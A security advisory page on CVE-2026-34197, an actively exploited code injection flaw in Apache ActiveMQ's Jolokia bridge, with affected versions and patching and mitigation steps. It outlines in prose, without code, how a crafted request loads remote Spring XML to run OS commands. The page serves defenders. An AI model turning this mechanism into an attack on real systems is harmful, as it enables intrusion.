RSS
Last updated: May 14, 2026 at 10:49 AM UTC
All 219 Vulnerability 76 Breach 45 Threat 91 Defense 7
Tag: message-broker (1 article)Clear
vulnerability
CVE-2026-34197
2026-04-17

13-year-old Apache ActiveMQ code injection flaw actively exploited - CISA gives federal agencies until April 30 to patch (CVE-2026-34197)

A critical code injection flaw in Apache ActiveMQ Classic has been under active exploitation in the wild, and CISA added it to the Known Exploited Vulnerabilities catalog on April 16 with a federal patch deadline of April 30. The flaw, tracked as CVE-2026-34197 (CVSS 8.8), has been 'hiding in plain sight' for 13 years according to Horizon3.ai researcher Naveen Sunkavally. The vulnerability is in the Jolokia JMX-HTTP bridge exposed at /api/jolokia/. An attacker can send crafted HTTP requests with a malicious discovery URI that forces the broker to load a remote Spring XML configuration. Because Spring initializes beans before validation, attackers execute arbitrary OS commands via Runtime.exec() - effectively turning a messaging broker into a remote command runner. Fortinet FortiGuard Labs telemetry shows exploitation attempts peaking on April 14, 2026. SAFE Security reports threat actors actively scanning for exposed Jolokia management endpoints.

apache-activemqjolokiacisa-kevcode-injectionactively-exploitedmessage-broker
Check
Inventory every ActiveMQ instance in your environment. If you don't know whether you run ActiveMQ, check with your dev team - it's embedded in many enterprise messaging pipelines and IoT data flows.
Affected
Apache ActiveMQ Classic versions 5.x before 5.19.4, and 6.0.0 before 6.2.3. The vulnerable component is the Jolokia JMX-HTTP bridge exposed via the web console at /api/jolokia/. Any internet-exposed ActiveMQ broker with default Jolokia configuration is at risk.
Fix
Upgrade to Apache ActiveMQ 5.19.4 or 6.2.3. If you cannot patch immediately: block external access to the /api/jolokia/ endpoint at your firewall or reverse proxy, restrict the Jolokia policy to specific MBeans only (not the default org.apache.activemq:* wildcard), and require authentication for all management operations. Check your access logs for HTTP requests to /api/jolokia/ with suspicious URI parameters over the past 30 days - exploitation requires only one successful request.